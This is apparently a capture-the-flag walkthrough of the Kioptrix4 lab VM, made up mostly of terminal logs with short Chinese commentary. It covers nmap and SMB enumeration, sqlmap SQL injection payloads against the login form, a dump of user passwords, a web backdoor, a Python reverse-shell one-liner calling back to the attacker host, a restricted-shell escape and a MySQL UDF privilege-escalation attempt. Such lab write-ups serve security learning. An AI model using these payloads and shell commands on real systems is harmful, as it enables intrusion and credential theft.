┌──(kali㉿kali)-[~/Downloads/Kioptrix4] └─$ sudo nmap --min-rate 10000 -p- 192.1.1.135 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-15 09:47 EDT Nmap scan report for 192.1.1.135 Host is up (0.0016s latency). Not shown: 39528 closed tcp ports (reset), 26003 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:D5:52:BC (VMware)
Nmap done: 1 IP address (1 host up) scanned in 18.66 seconds
┌──(kali㉿kali)-[~/Downloads/Kioptrix4] └─$ sudo nmap -sT -sV -sC -O -p22,80,139,445 192.1.1.135 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-15 09:49 EDT Nmap scan report for 192.1.1.135 Host is up (0.00039s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA) |_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Site doesn\'t have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP) MAC Address: 00:0C:29:D5:52:BC (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 49.43 seconds
┌──(kali㉿kali)-[~/Downloads/Kioptrix4] └─$ sudo nmap --script=vuln -p22,80,139,445 192.1.1.135 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-15 09:51 EDT Nmap scan report for 192.1.1.135 Host is up (0.00028s latency).
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-trace: TRACE is enabled |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server\'s resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_ http://ha.ckers.org/slowloris/ |_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn\'t find any DOM based XSS. | http-enum: | /database.sql: Possible database backup | /icons/: Potentially interesting folder w/ directory listing | /images/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch' |_ /index/: Potentially interesting folder |_http-csrf: Couldn\'t find any CSRF vulnerabilities. 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:D5:52:BC (VMware)
┌──(kali㉿kali)-[~/Downloads/Kioptrix4] └─$ sudo smbmap -H 192.1.1.135 [sudo] password for kali: [+] IP: 192.1.1.135:445 Name: 192.1.1.135 Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers IPC$ NO ACCESS IPC Service (Kioptrix4 server (Samba, Ubuntu))
┌──(kali㉿kali)-[~/Downloads/Kioptrix4] └─$ sudo nmap --script=smb-enum-shares.nse,smb-enum-users.nse 192.1.1.135 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-15 09:53 EDT Nmap scan report for 192.1.1.135 Host is up (0.00014s latency). Not shown: 566 closed tcp ports (reset), 430 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:D5:52:BC (VMware)
Host script results: | smb-enum-shares: | account_used: guest | \\192.1.1.135\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (Kioptrix4 server (Samba, Ubuntu)) | Users: 1 | Max Users: <unlimited> | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\192.1.1.135\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: <unlimited> | Path: C:\var\lib\samba\printers | Anonymous access: <none> |_ Current user access: <none> | smb-enum-users: | KIOPTRIX4\john (RID: 3002) | Full name: ,,, | Flags: Normal user account | KIOPTRIX4\loneferret (RID: 3000) | Full name: loneferret,,, | Flags: Normal user account | KIOPTRIX4\nobody (RID: 501) | Full name: nobody | Flags: Normal user account | KIOPTRIX4\robert (RID: 3004) | Full name: ,,, | Flags: Normal user account | KIOPTRIX4\root (RID: 1000) | Full name: root |_ Flags: Normal user account
Nmap done: 1 IP address (1 host up) scanned in 9.12 seconds
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:26:55 /2023-07-15/
[10:26:55] [INFO] parsing HTTP request from 'login' [10:26:56] [INFO] testing connection to the target URL [10:26:56] [INFO] checking if the target is protected by some kind of WAF/IPS [10:26:56] [INFO] testing if the target URL content is stable [10:26:56] [INFO] target URL content is stable [10:26:56] [INFO] testing if POST parameter 'myusername' is dynamic [10:26:56] [WARNING] POST parameter 'myusername' does not appear to be dynamic [10:26:56] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable [10:26:56] [INFO] testing for SQL injection on POST parameter 'myusername' [10:26:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:26:56] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [10:26:56] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [10:27:04] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [10:27:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' [10:27:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [10:27:06] [INFO] testing 'Generic inline queries' [10:27:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' [10:27:06] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more) [10:27:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' [10:27:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' [10:27:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [10:27:07] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [10:27:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)' [10:27:07] [INFO] testing 'Oracle AND time-based blind' it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y [10:27:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [10:27:09] [WARNING] POST parameter 'myusername' does not seem to be injectable [10:27:09] [INFO] testing if POST parameter 'mypassword' is dynamic [10:27:09] [WARNING] POST parameter 'mypassword' does not appear to be dynamic [10:27:09] [INFO] heuristic (basic) test shows that POST parameter 'mypassword' might be injectable (possible DBMS: 'MySQL') [10:27:09] [INFO] testing for SQL injection on POST parameter 'mypassword' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y for the remaining tests, do you want to include all tests for'MySQL' extending provided level (1) and risk (1) values? [Y/n] y [10:27:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:27:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [10:27:12] [INFO] testing 'Generic inline queries' [10:27:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' [10:27:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' got a 302 redirect to 'http://192.1.1.135/login_success.php?username=john'. Do you want to follow? [Y/n] y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y [10:27:15] [INFO] POST parameter 'mypassword' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --code=302) …………………………………… [10:27:25] [INFO] POST parameter 'mypassword' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable [10:27:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [10:27:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [10:27:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [10:27:25] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns' [10:27:25] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns' [10:27:25] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns' [10:27:25] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns' [10:27:25] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns' [10:27:25] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns' [10:27:25] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns' [10:27:25] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns' [10:27:25] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns' [10:27:25] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie'if you experience any problems during data retrieval [10:27:25] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y [10:27:30] [WARNING] POST parameter 'Submit' does not appear to be dynamic [10:27:30] [WARNING] heuristic (basic) test shows that POST parameter 'Submit' might not be injectable ……………………………………………… [10:27:41] [WARNING] POST parameter 'Submit' does not seem to be injectable sqlmap identified the following injection point(s) with a total of 3377 HTTP(s) requests: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=john&mypassword=-2527' OR 7958=7958#&Submit=Login
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: myusername=john&mypassword=1234' AND (SELECT 6799 FROM (SELECT(SLEEP(5)))huMm)-- NgWU&Submit=Login --- [10:27:41] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, PHP, Apache 2.2.8 back-end DBMS: MySQL >= 5.0.12 [10:27:41] [INFO] fetching current database [10:27:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads'for faster data retrieval [10:27:41] [INFO] retrieved: members current database: 'members' [10:27:41] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.1.1.135'
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:28:44 /2023-07-15/
[10:28:44] [INFO] parsing HTTP request from 'login' [10:28:44] [CRITICAL] all testable parameters you provided are not present within the given request data
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\'s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:28:51 /2023-07-15/
[10:28:51] [INFO] parsing HTTP request from 'login' [10:28:51] [INFO] resuming back-end DBMS 'mysql' [10:28:51] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=john&mypassword=-2527' OR 7958=7958#&Submit=Login
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: myusername=john&mypassword=1234' AND (SELECT 6799 FROM (SELECT(SLEEP(5)))huMm)-- NgWU&Submit=Login --- [10:28:51] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: Apache 2.2.8, PHP 5.2.4 back-end DBMS: MySQL >= 5.0.12 [10:28:51] [INFO] fetching tables for database: 'members' [10:28:51] [INFO] fetching number of tables for database 'members' [10:28:51] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [10:28:51] [INFO] retrieved: got a 302 redirect to 'http://192.1.1.135/login_success.php?username=john'. Do you want to follow? [Y/n] y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y 1 [10:28:57] [INFO] retrieved: members Database: members [1 table] +---------+ | members | +---------+
[10:28:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.1.1.135'
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\'s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:29:16 /2023-07-15/
[10:29:16] [INFO] parsing HTTP request from 'login' [10:29:16] [INFO] resuming back-end DBMS 'mysql' [10:29:16] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=john&mypassword=-2527' OR 7958=7958#&Submit=Login
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: myusername=john&mypassword=1234' AND (SELECT 6799 FROM (SELECT(SLEEP(5)))huMm)-- NgWU&Submit=Login --- [10:29:16] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: Apache 2.2.8, PHP 5.2.4 back-end DBMS: MySQL >= 5.0.12 [10:29:16] [INFO] fetching columns for table 'members' in database 'members' [10:29:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [10:29:16] [INFO] retrieved: got a 302 redirect to 'http://192.1.1.135/login_success.php?username=john'. Do you want to follow? [Y/n] y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y 3 [10:29:18] [INFO] retrieved: id [10:29:18] [INFO] retrieved: username [10:29:19] [INFO] retrieved: password [10:29:19] [INFO] fetching entries for table 'members' in database 'members' [10:29:19] [INFO] fetching number of entries for table 'members' in database 'members' [10:29:19] [INFO] retrieved: 2 [10:29:19] [INFO] retrieved: MyNameIsJohn [10:29:20] [INFO] retrieved: 1 [10:29:20] [INFO] retrieved: john [10:29:20] [INFO] retrieved: ADGAdsafdfwt4gadfga== [10:29:21] [INFO] retrieved: 2 [10:29:21] [INFO] retrieved: robert Database: members Table: members [2 entries] +----+----------+-----------------------+ | id | username | password | +----+----------+-----------------------+ | 1 | john | MyNameIsJohn | | 2 | robert | ADGAdsafdfwt4gadfga== | +----+----------+-----------------------+
[10:29:21] [INFO] table 'members.members' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.1.1.135/dump/members/members.csv' [10:29:21] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.1.1.135'
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:30:50 /2023-07-15/
[10:30:50] [INFO] parsing HTTP request from 'login' [10:30:50] [INFO] resuming back-end DBMS 'mysql' [10:30:50] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: mypassword (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: myusername=john&mypassword=-2527' OR 7958=7958#&Submit=Login
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: myusername=john&mypassword=1234' AND (SELECT 6799 FROM (SELECT(SLEEP(5)))huMm)-- NgWU&Submit=Login --- [10:30:50] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL >= 5.0.12 [10:30:50] [INFO] going to use a web backdoor forcommand prompt [10:30:50] [INFO] fingerprinting the back-end DBMS operating system [10:30:50] [INFO] the back-end DBMS operating system is Linux which web application language does the web server support? [1] ASP [2] ASPX [3] JSP [4] PHP (default)
[10:31:01] [INFO] retrieved the web server document root: '/var/www' [10:31:01] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php' [10:31:01] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method [10:31:01] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://192.1.1.135:80/tmpupkhq.php [10:31:01] [WARNING] unable to upload the file through the web file stager to '/var/www/' [10:31:01] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers do you want to try the same method used for the file stager? [Y/n] y [10:31:04] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://192.1.1.135:80/tmpbhprh.php [10:31:04] [INFO] calling OS shell. To quit type'x' or 'q' and press ENTER os-shell> whoami do you want to retrieve the command standard output? [Y/n/a] y command standard output: 'www-data' os-shell> id do you want to retrieve the command standard output? [Y/n/a] y command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> which python do you want to retrieve the command standard output? [Y/n/a] command standard output: '/usr/bin/python' os-shell> python --version do you want to retrieve the command standard output? [Y/n/a] command standard output: 'Python 2.5.2' os-shell> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.1.1.128",444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' do you want to retrieve the command standard output? [Y/n/a] No output
www-data@Kioptrix4:/var/www$ cat checklogin.php cat checklogin.php <?php ob_start(); $host="localhost"; // Host name $username="root"; // Mysql username $password=""; // Mysql password $db_name="members"; // Database name $tbl_name="members"; // Table name
// Connect to server and select databse. mysql_connect("$host", "$username", "$password")or die("cannot connect"); mysql_select_db("$db_name")or die("cannot select DB");
// Define $myusername and $mypassword $myusername=$_POST['myusername']; $mypassword=$_POST['mypassword'];
// To protect MySQL injection (more detail about MySQL injection) $myusername = stripslashes($myusername); //$mypassword = stripslashes($mypassword); $myusername = mysql_real_escape_string($myusername); //$mypassword = mysql_real_escape_string($mypassword);
//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'"; $result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'"); //$result=mysql_query($sql);
// Mysql_num_row is counting table row $count=mysql_num_rows($result); // If result matched $myusername and $mypassword, table row must be 1 row
if($count!=0){ // Register $myusername, $mypassword and redirect to file "login_success.php" session_register("myusername"); session_register("mypassword"); header("location:login_success.php?username=$myusername"); } else { echo"Wrong Username or Password"; print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>'); }
ob_end_flush(); ?>
拿到了数据库的密码(没有密码),结合刚才 SQL 注入拿到的密码,可以尝试 ssh 登录或者 su 切换用户,看一眼/etc/passwd 文件
www-data@Kioptrix4:/home$ su john su john Password: MyNameIsJohn
== Welcome LigGoat Employee == LigGoat Shell is in place so you don\'t screw up Type '?' or 'help' to get the list of allowed commands john:~$ su robert su robert *** unknown command: su john:~$ exit exit www-data@Kioptrix4:/home$ su robert su robert Password: ADGAdsafdfwt4gadfga==
== Welcome LigGoat Employee == LigGoat Shell is in place so you don\'t screw up Type '?' or 'help' to get the list of allowed commands robert:~$ id id *** unknown command: id robert:~$ whoami whoami
是受限的 shell 啊,那就先回到 www-data的用户里 ,简单的信息收集后再看看
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
www-data@Kioptrix4:/home/john$ cat .lhistory cat .lhistory ? help echo os.system('/bin/bash') exit su sudo ? scp touch hello help ls /root exit echo os.system('/bin/bash') exit su robert exit
┌──(kali㉿kali)-[~/Downloads/Kioptrix4] └─$ ssh john@192.1.1.135 -oHostKeyAlgorithms=ssh-rsa The authenticity of host '192.1.1.135 (192.1.1.135)' can\'t be established. RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.1.1.135' (RSA) to the list of known hosts. john@192.1.1.135\'s password: Welcome to LigGoat Security Systems - We are Watching == Welcome LigGoat Employee == LigGoat Shell is in place so you don\'t screw up Type '?' or 'help' to get the list of allowed commands john:~$ ? cd clear echo exit help ll lpath ls john:~$ echo os.system('/bin/bash') john@Kioptrix4:~$ whoami john
继续信息收集,寻找提权突破点
1 2 3 4 5 6 7 8
john@Kioptrix4:/$ sudo -l [sudo] password for john: Sorry, user john may not run sudo on Kioptrix4.
robert@Kioptrix4:/$ sudo -l [sudo] password for robert: Sorry, user robert may not run sudo on Kioptrix4.
www-data@Kioptrix4:/home/john$ cat /etc/crontab cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do.
# m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) #
ps aux 和 netstat ano,发现 MySQL 是 root 进程
1 2 3 4
john@Kioptrix4:~$ ps aux | grep mysql ps aux | grep mysql root 5015 0.0 0.5 130348 21380 ? Sl Jul15 0:07 /usr/sbin/mysql
还有一个细节,网站目录有两个 sqlmap 为了 os-shell 而写入的文件,属主是 root,或许可以尝试 UDF 提权,登录 MySQL 看看满不满足导入导出无限制的条件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
www-data@Kioptrix4:/var/www$ mysql -uroot mysql -uroot Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 7639 Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h'forhelp. Type '\c' to clear the buffer.
mysql> show global variables like '%secure_file_priv%'; show global variables like '%secure_file_priv%'; +------------------+-------+ | Variable_name | Value | +------------------+-------+ | secure_file_priv | | +------------------+-------+ 1 row inset (0.00 sec)
mysql> CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so'; CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so'; ERROR 1046 (3D000): No database selected mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | members | | mysql | +--------------------+ 3 rows inset (0.00 sec)
mysql> use mysql use mysql Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
There is more then one way to get root on this system. Try and find them. I\'ve only tested two (2) methods, but it doesn't mean there aren't more. As always there\'s an easy way, and a not so easy way to pop this box. Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it\'s not as easy as it may look, and also work and family life are my priorities. Hobbies are low on my list. Really hope you enjoyed this one.
If you haven\'t already, check out the other VMs available on: www.kioptrix.com
